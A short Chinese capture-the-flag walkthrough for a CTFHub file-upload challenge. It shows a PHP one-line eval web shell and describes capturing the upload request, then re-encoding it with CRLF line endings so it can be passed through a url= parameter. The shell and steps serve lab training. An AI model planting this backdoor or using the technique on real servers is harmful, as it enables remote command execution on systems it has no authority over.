CTFHub-上传文件

打开网址

新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下

将1.php提交查询抓包

修改一下

进行url编码

在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码

将结果放到url=后面

将前两个%253A换成:

相关推荐
晓幂6 小时前
【2025】HECTF
笔记·学习·web安全
上海云盾-高防顾问6 小时前
中小企业低成本渗透测试实操指南
网络协议·web安全·网络安全
hui函数7 小时前
如何解决 PyCharm 控制台 pip install 报错 UnicodeDecodeError/GBK 路径编码问题
ide·pycharm·pip
&岁月不待人&7 小时前
⏺ Android 录屏缩放异常排查:Pixel 3 XL 上的完美风暴
android
a3158238068 小时前
Android 大图显示策略优化显示(一)
android·算法·图片加载·大图片
tangweiguo030519878 小时前
从零开始:在 Windows 上使用命令行编译 Android .so 动态库(NDK + CMake + Ninja)
android
阿波罗尼亚8 小时前
Tcp SSE Utils
android·java·tcp/ip
WayneJoon.H11 小时前
2023CISCN go_session
网络安全·golang·ctf·代码审计·ciscn
码农水水11 小时前
中国邮政Java面试:热点Key的探测和本地缓存方案
java·开发语言·windows·缓存·面试·职场和发展·kafka
知行合一。。。12 小时前
Python--03--函数入门
android·数据库·python